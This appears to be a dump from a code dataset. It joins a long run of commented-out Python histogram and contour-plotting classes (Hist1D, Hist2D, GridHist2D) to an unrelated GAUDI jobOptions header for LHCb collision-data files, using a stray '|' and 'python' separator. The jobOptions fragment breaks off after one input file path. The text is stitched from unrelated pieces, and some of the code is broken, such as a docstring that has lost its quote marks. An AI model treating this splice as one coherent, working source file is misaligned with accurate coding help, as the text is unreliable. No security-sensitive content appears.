# raise ValueError("Unrecognized axnorm: %s" % axnorm)
# return agg
# def agg(self, **kwargs):
# if self.axnorm == "d":
# fcn = kwargs.get("fcn", None)
# if (fcn != "count") & (fcn is not None):
# raise ValueError("Unable to calculate a PDF with non-count aggregation")
# agg = super(Hist1D, self).agg(**kwargs)
# agg = self._axis_normalizer(agg)
# agg = self._agg_reindexer(agg)
# return agg
# def set_labels(self, **kwargs):
# if "z" in kwargs:
# raise ValueError(r"{} doesn't have a z-label".format(self))
# y = kwargs.pop("y", self.labels.y)
# if isinstance(y, labels_module.Count):
# y.set_axnorm(self.axnorm)
# y.build_label()
# super(Hist1D, self).set_labels(y=y, **kwargs)
# def make_plot(self, ax=None, fcn=None, **kwargs):
# f"""Make a plot.
# Parameters
# ----------
# ax: None, mpl.axis.Axis
# If `None`, create a subplot axis.
# fcn: None, str, aggregative function, or 2-tuple of strings
# Passed directly to `{self.__class__.__name__}.agg`. If
# None, use the default aggregation function. If str or a
# single aggregative function, use it.
# kwargs:
# Passed directly to `ax.plot`.
# """
# agg = self.agg(fcn=fcn)
# x = pd.IntervalIndex(agg.index).mid
# if fcn is None or isinstance(fcn, str):
# y = agg
# dy = None
# elif len(fcn) == 2:
# f0, f1 = fcn
# if isinstance(f0, FunctionType):
# f0 = f0.__name__
# if isinstance(f1, FunctionType):
# f1 = f1.__name__
# y = agg.loc[:, f0]
# dy = agg.loc[:, f1]
# else:
# raise ValueError(f"Unrecognized `fcn` ({fcn})")
# if ax is None:
# fig, ax = plt.subplots()
# if self.log.x:
# x = 10.0 ** x
# drawstyle = kwargs.pop("drawstyle", "steps-mid")
# pl, cl, bl = ax.errorbar(x, y, yerr=dy, drawstyle=drawstyle, **kwargs)
# self._format_axis(ax)
# return ax
# class Hist2D(base.Plot2D, AggPlot):
# r"""Create a 2D histogram with an optional z-value using an equal number
# of bins along the x and y axis.
# Parameters
# ----------
# x, y: pd.Series
# x and y data to aggregate
# z: None, pd.Series
# If not None, the z-value to aggregate.
# axnorm: str
# Normalize the histogram.
# key normalization
# --- -------------
# c column
# r row
# t total
# d density
# logx, logy: bool
# If True, log10 scale the axis.
# Properties
# ----------
# data:
# bins:
# cut:
# axnorm:
# log<x,y>:
# <x,y,z>label:
# path: None, Path
# Methods
# -------
# calc_bins:
# calculate the x, y bins.
# make_cut:
# Utilize the calculated bins to convert (x, y) into pd.Categoral
# or pd.Interval values used in aggregation.
# set_[x,y,z]label:
# Set the x, y, or z label.
# agg:
# Aggregate the data in the bins.
# If z-value is None, count the number of points in each bin.
# If z-value is not None, calculate the mean for each bin.
# make_plot:
# Make a 2D plot of the data with an optional color bar.
# """
# def __init__(
# self,
# x,
# y,
# z=None,
# axnorm=None,
# logx=False,
# logy=False,
# clip_data=False,
# nbins=101,
# bin_precision=None,
# ):
# super(Hist2D, self).__init__()
# self.set_log(x=logx, y=logy)
# self.set_data(x, y, z, clip_data)
# self.set_labels(
# x="x", y="y", z=labels_module.Count(norm=axnorm) if z is None else "z"
# )
# self.set_axnorm(axnorm)
# self.calc_bins_intervals(nbins=nbins, precision=bin_precision)
# self.make_cut()
# self.set_clim(None, None)
# @property
# def _gb_axes(self):
# return ("x", "y")
# def _maybe_convert_to_log_scale(self, x, y):
# if self.log.x:
# x = 10.0 ** x
# if self.log.y:
# y = 10.0 ** y
# return x, y
# # def set_path(self, new, add_scale=True):
# # # Bug: path doesn't auto-set log information.
# # path, x, y, z, scale_info = super(Hist2D, self).set_path(new, add_scale)
# # if new == "auto":
# # path = path / x / y / z
# # else:
# # assert x is None
# # assert y is None
# # assert z is None
# # if add_scale:
# # assert scale_info is not None
# # scale_info = "-".join(scale_info)
# # if bool(len(path.parts)) and path.parts[-1].endswith("norm"):
# # # Insert <norm> at end of path so scale order is (x, y, z).
# # path = path.parts
# # path = path[:-1] + (scale_info + "-" + path[-1],)
# # path = Path(*path)
# # else:
# # path = path / scale_info
# # self._path = path
# # set_path.__doc__ = base.Base.set_path.__doc__
# def set_labels(self, **kwargs):
# z = kwargs.pop("z", self.labels.z)
# if isinstance(z, labels_module.Count):
# try:
# z.set_axnorm(self.axnorm)
# except AttributeError:
# pass
# z.build_label()
# super(Hist2D, self).set_labels(z=z, **kwargs)
# # def set_data(self, x, y, z, clip):
# # data = pd.DataFrame(
# # {
# # "x": np.log10(np.abs(x)) if self.log.x else x,
# # "y": np.log10(np.abs(y)) if self.log.y else y,
# # }
# # )
# #
# #
# # if z is None:
# # z = pd.Series(1, index=x.index)
# #
# # data.loc[:, "z"] = z
# # data = data.dropna()
# # if not data.shape[0]:
# # raise ValueError(
# # "You can't build a %s with data that is exclusively NaNs"
# # % self.__class__.__name__
# # )
# #
# # self._data = data
# # self._clip = clip
# def set_data(self, x, y, z, clip):
# super(Hist2D, self).set_data(x, y, z, clip)
# data = self.data
# if self.log.x:
# data.loc[:, "x"] = np.log10(np.abs(data.loc[:, "x"]))
# if self.log.y:
# data.loc[:, "y"] = np.log10(np.abs(data.loc[:, "y"]))
# self._data = data
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# ===== =============================================================
# key description
# ===== =============================================================
# c Column normalize
# d Density normalize
# r Row normalize
# t Total normalize
# ===== =============================================================
# """
# if new is not None:
# new = new.lower()[0]
# assert new in ("c", "r", "t", "d")
# zlbl = self.labels.z
# if isinstance(zlbl, labels_module.Count):
# zlbl.set_axnorm(new)
# zlbl.build_label()
# self._axnorm = new
# def _axis_normalizer(self, agg):
# r"""Takes care of row, column, total, and density normaliation.
# Written basically as `staticmethod` so that can be called in `OrbitHist2D`, but
# as actual method with `self` passed so we have access to `self.log` for density
# normalization.
# """
# axnorm = self.axnorm
# if axnorm is None:
# pass
# elif axnorm == "c":
# agg = agg.divide(agg.max(level="x"), level="x")
# elif axnorm == "r":
# agg = agg.divide(agg.max(level="y"), level="y")
# elif axnorm == "t":
# agg = agg.divide(agg.max())
# elif axnorm == "d":
# N = agg.sum().sum()
# x = pd.IntervalIndex(agg.index.get_level_values("x").unique())
# y = pd.IntervalIndex(agg.index.get_level_values("y").unique())
# dx = pd.Series(
# x.length, index=x
# ) # dx = pd.Series(x.right - x.left, index=x)
# dy = pd.Series(
# y.length, index=y
# ) # dy = pd.Series(y.right - y.left, index=y)
# if self.log.x:
# dx = 10.0 ** dx
# if self.log.y:
# dy = 10.0 ** dy
# agg = agg.divide(dx, level="x").divide(dy, level="y").divide(N)
# elif hasattr(axnorm, "__iter__"):
# kind, fcn = axnorm
# if kind == "c":
# agg = agg.divide(agg.agg(fcn, level="x"), level="x")
# elif kind == "r":
# agg = agg.divide(agg.agg(fcn, level="y"), level="y")
# else:
# raise ValueError(f"Unrecognized axnorm with function ({kind}, {fcn})")
# else:
# raise ValueError(f"Unrecognized axnorm ({axnorm})")
# return agg
# def agg(self, **kwargs):
# agg = super(Hist2D, self).agg(**kwargs)
# agg = self._axis_normalizer(agg)
# agg = self._agg_reindexer(agg)
# return agg
# def _make_cbar(self, mappable, **kwargs):
# ticks = kwargs.pop(
# "ticks",
# mpl.ticker.MultipleLocator(0.1) if self.axnorm in ("c", "r") else None,
# )
# return super(Hist2D, self)._make_cbar(mappable, ticks=ticks, **kwargs)
# def _limit_color_norm(self, norm):
# if self.axnorm in ("c", "r"):
# # Don't limit us to (1%, 99%) interval.
# return None
# pct = self.data.loc[:, "z"].quantile([0.01, 0.99])
# v0 = pct.loc[0.01]
# v1 = pct.loc[0.99]
# if norm.vmin is None:
# norm.vmin = v0
# if norm.vmax is None:
# norm.vmax = v1
# norm.clip = True
# def make_plot(
# self,
# ax=None,
# cbar=True,
# limit_color_norm=False,
# cbar_kwargs=None,
# fcn=None,
# alpha_fcn=None,
# **kwargs,
# ):
# r"""
# Make a 2D plot on `ax` using `ax.pcolormesh`.
# Paremeters
# ----------
# ax: mpl.axes.Axes, None
# If None, create an `Axes` instance from `plt.subplots`.
# cbar: bool
# If True, create color bar with `labels.z`.
# limit_color_norm: bool
# If True, limit the color range to 0.001 and 0.999 percentile range
# of the z-value, count or otherwise.
# cbar_kwargs: dict, None
# If not None, kwargs passed to `self._make_cbar`.
# fcn: FunctionType, None
# Aggregation function. If None, automatically select in :py:meth:`agg`.
# alpha_fcn: None, str
# If not None, the function used to aggregate the data for setting alpha
# value.
# kwargs:
# Passed to `ax.pcolormesh`.
# If row or column normalized data, `norm` defaults to `mpl.colors.Normalize(0, 1)`.
# Returns
# -------
# ax: mpl.axes.Axes
# Axes upon which plot was made.
# cbar_or_mappable: colorbar.Colorbar, mpl.collections.QuadMesh
# If `cbar` is True, return the colorbar. Otherwise, return the `Quadmesh` used
# to create the colorbar.
# """
# agg = self.agg(fcn=fcn).unstack("x")
# x = self.edges["x"]
# y = self.edges["y"]
# # assert x.size == agg.shape[1] + 1
# # assert y.size == agg.shape[0] + 1
# # HACK: Works around `gb.agg(observed=False)` pandas bug. (GH32381)
# if x.size != agg.shape[1] + 1:
# # agg = agg.reindex(columns=self.intervals["x"])
# agg = agg.reindex(columns=self.categoricals["x"])
# if y.size != agg.shape[0] + 1:
# # agg = agg.reindex(index=self.intervals["y"])
# agg = agg.reindex(index=self.categoricals["y"])
# if ax is None:
# fig, ax = plt.subplots()
# # if self.log.x:
# # x = 10.0 ** x
# # if self.log.y:
# # y = 10.0 ** y
# x, y = self._maybe_convert_to_log_scale(x, y)
# axnorm = self.axnorm
# norm = kwargs.pop(
# "norm",
# mpl.colors.BoundaryNorm(np.linspace(0, 1, 11), 256, clip=True)
# if axnorm in ("c", "r")
# else None,
# )
# if limit_color_norm:
# self._limit_color_norm(norm)
# C = np.ma.masked_invalid(agg.values)
# XX, YY = np.meshgrid(x, y)
# pc = ax.pcolormesh(XX, YY, C, norm=norm, **kwargs)
# cbar_or_mappable = pc
# if cbar:
# if cbar_kwargs is None:
# cbar_kwargs = dict()
# if "cax" not in cbar_kwargs.keys() and "ax" not in cbar_kwargs.keys():
# cbar_kwargs["ax"] = ax
# # Pass `norm` to `self._make_cbar` so that we can choose the ticks to use.
# cbar = self._make_cbar(pc, norm=norm, **cbar_kwargs)
# cbar_or_mappable = cbar
# self._format_axis(ax)
# color_plot = self.data.loc[:, self.agg_axes].dropna().unique().size > 1
# if (alpha_fcn is not None) and color_plot:
# self.logger.warning(
# "Make sure you verify alpha actually set. I don't yet trust this."
# )
# alpha_agg = self.agg(fcn=alpha_fcn)
# alpha_agg = alpha_agg.unstack("x")
# alpha_agg = np.ma.masked_invalid(alpha_agg.values.ravel())
# # Feature scale then invert so smallest STD
# # is most opaque.
# alpha = 1 - mpl.colors.Normalize()(alpha_agg)
# self.logger.warning("Scaling alpha filter as alpha**0.25")
# alpha = alpha ** 0.25
# # Set masked values to zero. Otherwise, masked
# # values are rendered as black.
# alpha = alpha.filled(0)
# # Must draw to initialize `facecolor`s
# plt.draw()
# # Remove `pc` from axis so we can redraw with std
# # pc.remove()
# colors = pc.get_facecolors()
# colors[:, 3] = alpha
# pc.set_facecolor(colors)
# # ax.add_collection(pc)
# elif alpha_fcn is not None:
# self.logger.warning("Ignoring `alpha_fcn` because plotting counts")
# return ax, cbar_or_mappable
# def get_border(self):
# r"""Get the top and bottom edges of the plot.
# Returns
# -------
# border: namedtuple
# Contains "top" and "bottom" fields, each with a :py:class:`pd.Series`.
# """
# Border = namedtuple("Border", "top,bottom")
# top = {}
# bottom = {}
# for x, v in self.agg().unstack("x").items():
# yt = v.last_valid_index()
# if yt is not None:
# z = v.loc[yt]
# top[(yt, x)] = z
# yb = v.first_valid_index()
# if yb is not None:
# z = v.loc[yb]
# bottom[(yb, x)] = z
# top = pd.Series(top)
# bottom = pd.Series(bottom)
# for edge in (top, bottom):
# edge.index.names = ["y", "x"]
# border = Border(top, bottom)
# return border
# def _plot_one_edge(
# self,
# ax,
# edge,
# smooth=False,
# sg_kwargs=None,
# xlim=(None, None),
# ylim=(None, None),
# **kwargs,
# ):
# x = edge.index.get_level_values("x").mid
# y = edge.index.get_level_values("y").mid
# if sg_kwargs is None:
# sg_kwargs = dict()
# if smooth:
# wlength = sg_kwargs.pop("window_length", int(np.floor(y.shape[0] / 10)))
# polyorder = sg_kwargs.pop("polyorder", 3)
# if not wlength % 2:
# wlength -= 1
# y = savgol_filter(y, wlength, polyorder, **sg_kwargs)
# if self.log.x:
# x = 10.0 ** x
# if self.log.y:
# y = 10.0 ** y
# x0, x1 = xlim
# y0, y1 = ylim
# tk = np.full_like(x, True, dtype=bool)
# if x0 is not None:
# tk = tk & (x0 <= x)
# if x1 is not None:
# tk = tk & (x <= x1)
# if y0 is not None:
# tk = tk & (y0 <= y)
# if y1 is not None:
# tk = tk & (y <= y1)
# # if (~tk).any():
# x = x[tk]
# y = y[tk]
# return ax.plot(x, y, **kwargs)
# def plot_edges(self, ax, smooth=True, sg_kwargs=None, **kwargs):
# r"""Overplot the edges.
# Parameters
# ----------
# ax:
# Axis on which to plot.
# smooth: bool
# If True, apply a Savitzky-Golay filter (:py:func:`scipy.signal.savgol_filter`)
# to the y-values before plotting to smooth the curve.
# sg_kwargs: dict, None
# If not None, dict of kwargs passed to Savitzky-Golay filter. Also allows
# for setting of `window_length` and `polyorder` as kwargs. They default to
# 10\% of the number of observations (`window_length`) and 3 (`polyorder`).
# Note that because `window_length` must be odd, if the 10\% value is even, we
# take 1-window_length.
# kwargs:
# Passed to `ax.plot`
# """
# top, bottom = self.get_border()
# color = kwargs.pop("color", "cyan")
# label = kwargs.pop("label", None)
# etop = self._plot_one_edge(
# ax, top, smooth, sg_kwargs, color=color, label=label, **kwargs
# )
# ebottom = self._plot_one_edge(
# ax, bottom, smooth, sg_kwargs, color=color, **kwargs
# )
# return etop, ebottom
# def _get_contour_levels(self, levels):
# if (levels is not None) or (self.axnorm is None):
# pass
# elif (levels is None) and (self.axnorm == "t"):
# levels = [0.01, 0.1, 0.3, 0.7, 0.99]
# elif (levels is None) and (self.axnorm == "d"):
# levels = [3e-5, 1e-4, 3e-4, 1e-3, 1.7e-3, 2.3e-3]
# elif (levels is None) and (self.axnorm in ["r", "c"]):
# levels = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
# else:
# raise ValueError(
# f"Unrecognized axis normalization {self.axnorm} for default levels."
# )
# return levels
# def _verify_contour_passthrough_kwargs(
# self, ax, clabel_kwargs, edges_kwargs, cbar_kwargs
# ):
# if clabel_kwargs is None:
# clabel_kwargs = dict()
# if edges_kwargs is None:
# edges_kwargs = dict()
# if cbar_kwargs is None:
# cbar_kwargs = dict()
# if "cax" not in cbar_kwargs.keys() and "ax" not in cbar_kwargs.keys():
# cbar_kwargs["ax"] = ax
# return clabel_kwargs, edges_kwargs, cbar_kwargs
# def plot_contours(
# self,
# ax=None,
# label_levels=True,
# cbar=True,
# limit_color_norm=False,
# cbar_kwargs=None,
# fcn=None,
# plot_edges=True,
# edges_kwargs=None,
# clabel_kwargs=None,
# skip_max_clbl=True,
# use_contourf=False,
# gaussian_filter_std=0,
# gaussian_filter_kwargs=None,
# **kwargs,
# ):
# f"""Make a contour plot on `ax` using `ax.contour`.
# Paremeters
# ----------
# ax: mpl.axes.Axes, None
# If None, create an `Axes` instance from `plt.subplots`.
# label_levels: bool
# If True, add labels to contours with `ax.clabel`.
# cbar: bool
# If True, create color bar with `labels.z`.
# limit_color_norm: bool
# If True, limit the color range to 0.001 and 0.999 percentile range
# of the z-value, count or otherwise.
# cbar_kwargs: dict, None
# If not None, kwargs passed to `self._make_cbar`.
# fcn: FunctionType, None
# Aggregation function. If None, automatically select in :py:meth:`agg`.
# plot_edges: bool
# If True, plot the smoothed, extreme edges of the 2D histogram.
# edges_kwargs: None, dict
# Passed to {self.plot_edges!s}.
# clabel_kwargs: None, dict
# If not None, dictionary of kwargs passed to `ax.clabel`.
# skip_max_clbl: bool
# If True, don't label the maximum contour. Primarily used when the maximum
# contour is, effectively, a point.
# maximum_color:
# The color for the maximum of the PDF.
# use_contourf: bool
# If True, use `ax.contourf`. Else use `ax.contour`.
# gaussian_filter_std: int
# If > 0, apply `scipy.ndimage.gaussian_filter` to the z-values using the
# standard deviation specified by `gaussian_filter_std`.
# gaussian_filter_kwargs: None, dict
# If not None and gaussian_filter_std > 0, passed to :py:meth:`scipy.ndimage.gaussian_filter`
# kwargs:
# Passed to :py:meth:`ax.pcolormesh`.
# If row or column normalized data, `norm` defaults to `mpl.colors.Normalize(0, 1)`.
# """
# levels = kwargs.pop("levels", None)
# cmap = kwargs.pop("cmap", None)
# norm = kwargs.pop(
# "norm",
# mpl.colors.BoundaryNorm(np.linspace(0, 1, 11), 256, clip=True)
# if self.axnorm in ("c", "r")
# else None,
# )
# linestyles = kwargs.pop(
# "linestyles",
# [
# "-",
# ":",
# "--",
# (0, (7, 3, 1, 3, 1, 3, 1, 3, 1, 3)),
# "--",
# ":",
# "-",
# (0, (7, 3, 1, 3, 1, 3)),
# ],
# )
# if ax is None:
# fig, ax = plt.subplots()
# clabel_kwargs, edges_kwargs, cbar_kwargs = self._verify_contour_passthrough_kwargs(
# ax, clabel_kwargs, edges_kwargs, cbar_kwargs
# )
# inline = clabel_kwargs.pop("inline", True)
# inline_spacing = clabel_kwargs.pop("inline_spacing", -3)
# fmt = clabel_kwargs.pop("fmt", "%s")
# agg = self.agg(fcn=fcn).unstack("x")
# x = self.intervals["x"].mid
# y = self.intervals["y"].mid
# # assert x.size == agg.shape[1]
# # assert y.size == agg.shape[0]
# # HACK: Works around `gb.agg(observed=False)` pandas bug. (GH32381)
# if x.size != agg.shape[1]:
# # agg = agg.reindex(columns=self.intervals["x"])
# agg = agg.reindex(columns=self.categoricals["x"])
# if y.size != agg.shape[0]:
# # agg = agg.reindex(index=self.intervals["y"])
# agg = agg.reindex(index=self.categoricals["y"])
# x, y = self._maybe_convert_to_log_scale(x, y)
# XX, YY = np.meshgrid(x, y)
# C = agg.values
# if gaussian_filter_std:
# from scipy.ndimage import gaussian_filter
# if gaussian_filter_kwargs is None:
# gaussian_filter_kwargs = dict()
# C = gaussian_filter(C, gaussian_filter_std, **gaussian_filter_kwargs)
# C = np.ma.masked_invalid(C)
# assert XX.shape == C.shape
# assert YY.shape == C.shape
# class nf(float):
# # Source: https://matplotlib.org/3.1.0/gallery/images_contours_and_fields/contour_label_demo.html
# Define a class that forces the representation of a float to look a certain way.
# This removes the trailing zero so '1.0' becomes '1'.
# def __repr__(self):
# return str(self).rstrip("0")
# levels = self._get_contour_levels(levels)
# contour_fcn = ax.contour
# if use_contourf:
# contour_fcn = ax.contourf
# if levels is None:
# args = [XX, YY, C]
# else:
# args = [XX, YY, C, levels]
# qset = contour_fcn(*args, linestyles=linestyles, cmap=cmap, norm=norm, **kwargs)
# try:
# args = (qset, levels[:-1] if skip_max_clbl else levels)
# except TypeError:
# # None can't be subscripted.
# args = (qset,)
# lbls = None
# if label_levels:
# qset.levels = [nf(level) for level in qset.levels]
# lbls = ax.clabel(
# *args, inline=inline, inline_spacing=inline_spacing, fmt=fmt
# )
# if plot_edges:
# etop, ebottom = self.plot_edges(ax, **edges_kwargs)
# cbar_or_mappable = qset
# if cbar:
# # Pass `norm` to `self._make_cbar` so that we can choose the ticks to use.
# cbar = self._make_cbar(qset, norm=norm, **cbar_kwargs)
# cbar_or_mappable = cbar
# self._format_axis(ax)
# return ax, lbls, cbar_or_mappable, qset
# def project_1d(self, axis, only_plotted=True, project_counts=False, **kwargs):
# f"""Make a `Hist1D` from the data stored in this `His2D`.
# Parameters
# ----------
# axis: str
# "x" or "y", specifying the axis to project into 1D.
# only_plotted: bool
# If True, only pass data that appears in the {self.__class__.__name__} plot
# to the :py:class:`Hist1D`.
# project_counts: bool
# If True, only send the variable plotted along `axis` to :py:class:`Hist1D`.
# Otherwise, send both axes (but not z-values).
# kwargs:
# Passed to `Hist1D`. Primarily to allow specifying `bin_precision`.
# Returns
# -------
# h1: :py:class:`Hist1D`
# """
# axis = axis.lower()
# assert axis in ("x", "y")
# data = self.data
# if data.loc[:, "z"].unique().size >= 2:
# # Either all 1 or 1 and NaN.
# other = "z"
# else:
# possible_axes = {"x", "y"}
# possible_axes.remove(axis)
# other = possible_axes.pop()
# logx = self.log._asdict()[axis]
# x = self.data.loc[:, axis]
# if logx:
# # Need to convert back to regular from log-space for data setting.
# x = 10.0 ** x
# y = self.data.loc[:, other] if not project_counts else None
# logy = False # Defined b/c project_counts option.
# if y is not None:
# # Only select y-values plotted.
# logy = self.log._asdict()[other]
# yedges = self.edges[other].values
# y = y.where((yedges[0] <= y) & (y <= yedges[-1]))
# if logy:
# y = 10.0 ** y
# if only_plotted:
# tk = self.get_plotted_data_boolean_series()
# x = x.loc[tk]
# if y is not None:
# y = y.loc[tk]
# h1 = Hist1D(
# x,
# y=y,
# logx=logx,
# clip_data=False, # Any clipping will be addressed by bins.
# nbins=self.edges[axis].values,
# **kwargs,
# )
# h1.set_log(y=logy) # Need to propagate logy.
# h1.set_labels(x=self.labels._asdict()[axis])
# if not project_counts:
# h1.set_labels(y=self.labels._asdict()[other])
# h1.set_path("auto")
# return h1
# class GridHist2D(object):
# r"""A grid of 2D heatmaps separating the data based on a categorical value.
# Properties
# ----------
# data: pd.DataFrame
# axnorm: str or None
# Specify if column, row, total, or density normalization should be used.
# log: namedtuple
# Contains booleans identifying axes to log-scale.
# nbins: int or str
# Pass to `np.histogram_bin_edges` or `astropy.stats.knuth_bin_width`
# depending on the input.
# labels: namedtuple
# Contains axis labels. Recommend using `labels.TeXlabel` so
# grouped: pd.GroupBy
# The data grouped by the categorical.
# hist2ds: pd.Series
# The `Hist2D` objects created for each axis. Index is the unique
# categorical values.
# fig: mpl.figure.Figure
# The figure upon which the axes are placed.
# axes: pd.Series
# Contains the mpl axes upon which plots are drawn. Index should be
# identical to `hist2ds`.
# cbars: pd.Series
# Contains the colorbar instances. Similar to `hist2ds` and `axes`.
# cnorms: mpl.color.Normalize or pd.Series
# mpl.colors.Normalize instance or a pd.Series of them with one for
# each unique categorical value.
# use_gs: bool
# An attempt at the code is written, but not implemented because some
# minor details need to be worked out. Ideally, if True, use a single
# colorbar for the entire grid.
# Methods
# -------
# set_<>: setters
# For data, nbins, axnorm, log, labels, cnorms.
# make_h2ds:
# Make the `Hist2D` objects.
# make_plots:
# Make the `Hist2D` plots.
# """
# def __init__(self, x, y, cat, z=None):
# r"""Create 2D heatmaps of x, y, and optional z data in a grid for which
# each unique element in `cat` specifies one plot.
# Parameters
# ----------
# x, y, z: pd.Series or np.array
# The data to aggregate. pd.Series is preferred.
# cat: pd.Categorical
# The categorical series used to create subsets of the data for each
# grid element.
# """
# self.set_nbins(101)
# self.set_axnorm(None)
# self.set_log(x=False, y=False)
# self.set_data(x, y, cat, z)
# self._labels = base.AxesLabels("x", "y") # Unsure how else to set defaults.
# self.set_cnorms(None)
# @property
# def data(self):
# return self._data
# @property
# def axnorm(self):
# r"""Axis normalization."""
# return self._axnorm
# @property
# def logger(self):
# return self._log
# @property
# def nbins(self):
# return self._nbins
# @property
# def log(self):
# r"""LogAxes booleans.
# """
# return self._log
# @property
# def labels(self):
# return self._labels
# @property
# def grouped(self):
# return self.data.groupby("cat")
# @property
# def hist2ds(self):
# try:
# return self._h2ds
# except AttributeError:
# return self.make_h2ds()
# @property
# def fig(self):
# try:
# return self._fig
# except AttributeError:
# return self.init_fig()[0]
# @property
# def axes(self):
# try:
# return self._axes
# except AttributeError:
# return self.init_fig()[1]
# @property
# def cbars(self):
# return self._cbars
# @property
# def cnorms(self):
# r"""Color normalization (mpl.colors.Normalize instance)."""
# return self._cnorms
# @property
# def use_gs(self):
# return self._use_gs
# @property
# def path(self):
# raise NotImplementedError("Just haven't sat down to write this.")
# def _init_logger(self):
# self._logger = logging.getLogger(
# "{}.{}".format(__name__, self.__class__.__name__)
# )
# def set_nbins(self, new):
# self._nbins = new
# def set_axnorm(self, new):
# self._axnorm = new
# def set_cnorms(self, new):
# self._cnorms = new
# def set_log(self, x=None, y=None):
# if x is None:
# x = self.log.x
# if y is None:
# y = self.log.y
# log = base.LogAxes(x, y)
# self._log = log
# def set_data(self, x, y, cat, z):
# data = {"x": x, "y": y, "cat": cat}
# if z is not None:
# data["z"] = z
# data = pd.concat(data, axis=1)
# self._data = data
# def set_labels(self, **kwargs):
# r"""Set or update x, y, or z labels. Any label not specified in kwargs
# is propagated from `self.labels.<x, y, or z>`.
# """
# x = kwargs.pop("x", self.labels.x)
# y = kwargs.pop("y", self.labels.y)
# z = kwargs.pop("z", self.labels.z)
# if len(kwargs.keys()):
# raise KeyError("Unexpected kwarg: {}".format(kwargs.keys()))
# self._labels = base.AxesLabels(x, y, z)
# def set_fig_axes(self, fig, axes, use_gs=False):
# self._set_fig(fig)
# self._set_axes(axes)
# self._use_gs = bool(use_gs)
# def _set_fig(self, new):
# self._fig = new
# def _set_axes(self, new):
# if new.size != len(self.grouped.groups.keys()) + 1:
# msg = "Number of axes must match number of Categoricals + 1 for All."
# raise ValueError(msg)
# keys = ["All"] + sorted(self.grouped.groups.keys())
# axes = pd.Series(new.ravel(), index=pd.CategoricalIndex(keys))
# self._axes = axes
# def init_fig(self, use_gs=False, layout="auto", scale=1.5):
# if layout == "auto":
# raise NotImplementedError(
# """Need some densest packing algorithm I haven't
# found yet"""
# )
# assert len(layout) == 2
# nrows, ncols = layout
# if use_gs:
# raise NotImplementedError(
# """Unsure how to consistently store single cax or
# deal with variable layouts."""
# )
# fig = plt.figure(figsize=np.array([8, 6]) * scale)
# gs = mpl.gridspec.GridSpec(
# 3,
# 5,
# width_ratios=[1, 1, 1, 1, 0.1],
# height_ratios=[1, 1, 1],
# hspace=0,
# wspace=0,
# figure=fig,
# )
# axes = np.array(12 * [np.nan], dtype=object).reshape(3, 4)
# sharer = None
# for i in np.arange(0, 3):
# for j in np.arange(0, 4):
# if i and j:
# a = plt.subplot(gs[i, j], sharex=sharer, sharey=sharer)
# else:
# a = plt.subplot(gs[i, j])
# sharer = a
# axes[i, j] = a
# others = axes.ravel().tolist()
# a0 = others.pop(8)
# a0.get_shared_x_axes().join(a0, *others)
# a0.get_shared_y_axes().join(a0, *others)
# for ax in axes[:-1, 1:].ravel():
# # All off
# ax.tick_params(labelbottom=False, labelleft=False)
# ax.xaxis.label.set_visible(False)
# ax.yaxis.label.set_visible(False)
# for ax in axes[:-1, 0].ravel():
# # 0th column x-labels off.
# ax.tick_params(which="x", labelbottom=False)
# ax.xaxis.label.set_visible(False)
# for ax in axes[-1, 1:].ravel():
# # Nth row y-labels off.
# ax.tick_params(which="y", labelleft=False)
# ax.yaxis.label.set_visible(False)
# # cax = plt.subplot(gs[:, -1])
# else:
# fig, axes = tools.subplots(
# nrows=nrows, ncols=ncols, scale_width=scale, scale_height=scale
# )
# # cax = None
# self.set_fig_axes(fig, axes, use_gs)
# return fig, axes
# def _build_one_hist2d(self, x, y, z):
# h2d = Hist2D(
# x,
# y,
# z=z,
# logx=self.log.x,
# logy=self.log.y,
# clip_data=False,
# nbins=self.nbins,
# )
# h2d.set_axnorm(self.axnorm)
# xlbl, ylbl, zlbl = self.labels.x, self.labels.y, self.labels.z
# h2d.set_labels(x=xlbl, y=ylbl, z=zlbl)
# return h2d
# def make_h2ds(self):
# grouped = self.grouped
# # Build case that doesn't include subgroups.
# x = self.data.loc[:, "x"]
# y = self.data.loc[:, "y"]
# try:
# z = self.data.loc[:, "z"]
# except KeyError:
# z = None
# hall = self._build_one_hist2d(x, y, z)
# h2ds = {"All": hall}
# for k, g in grouped:
# x = g.loc[:, "x"]
# y = g.loc[:, "y"]
# try:
# z = g.loc[:, "z"]
# except KeyError:
# z = None
# h2ds[k] = self._build_one_hist2d(x, y, z)
# h2ds = pd.Series(h2ds)
# self._h2ds = h2ds
# return h2ds
# @staticmethod
# def _make_axis_text_label(key):
# r"""Format the `key` identifying the Categorial group for this axis. To modify,
# sublcass `GridHist2D` and redefine this staticmethod.
# """
# return key
# def _format_axes(self):
# axes = self.axes
# for k, ax in axes.items():
# lbl = self._make_axis_text_label(k)
# ax.text(
# 0.025,
# 0.95,
# lbl,
# transform=ax.transAxes,
# va="top",
# fontdict={"color": "k"},
# bbox={"color": "wheat"},
# )
# # ax.set_xlim(-1, 1)
# # ax.set_ylim(-1, 1)
# def make_plots(self, **kwargs):
# h2ds = self.hist2ds
# axes = self.axes
# cbars = {}
# cnorms = self.cnorms
# for k, h2d in h2ds.items():
# if isinstance(cnorms, mpl.colors.Normalize) or cnorms is None:
# cnorm = cnorms
# else:
# cnorm = cnorms.loc[k]
# ax = axes.loc[k]
# ax, cbar = h2d.make_plot(ax=ax, norm=cnorm, **kwargs)
# if not self.use_gs:
# cbars[k] = cbar
# else:
# raise NotImplementedError(
# "Unsure how to handle `use_gs == True` for color bars."
# )
# cbars = pd.Series(cbars)
# self._format_axes()
# self._cbars = cbars
|
python
|
#-- GAUDI jobOptions generated on Mon Oct 12 10:07:37 2020
#-- Contains event types :
#-- 90000000 - 3737 files - 56787251 events - 2862.54 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass: '/Real Data/Reco14/Stripping21r1'
#-- StepId : 127013
#-- StepName : Stripping21r1-Merging-DV-v36r1
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v36r1
#-- OptionFiles : $APPCONFIGOPTS/Merging/DV-Stripping-Merging.py
#-- DDDB : dddb-20130929
#-- CONDDB : cond-20141107
#-- ExtraPackages : AppConfig.v3r203;Det/SQLDDDB.v7r10
#-- Visible : N
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles([
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044696_1.semileptonic.dst',
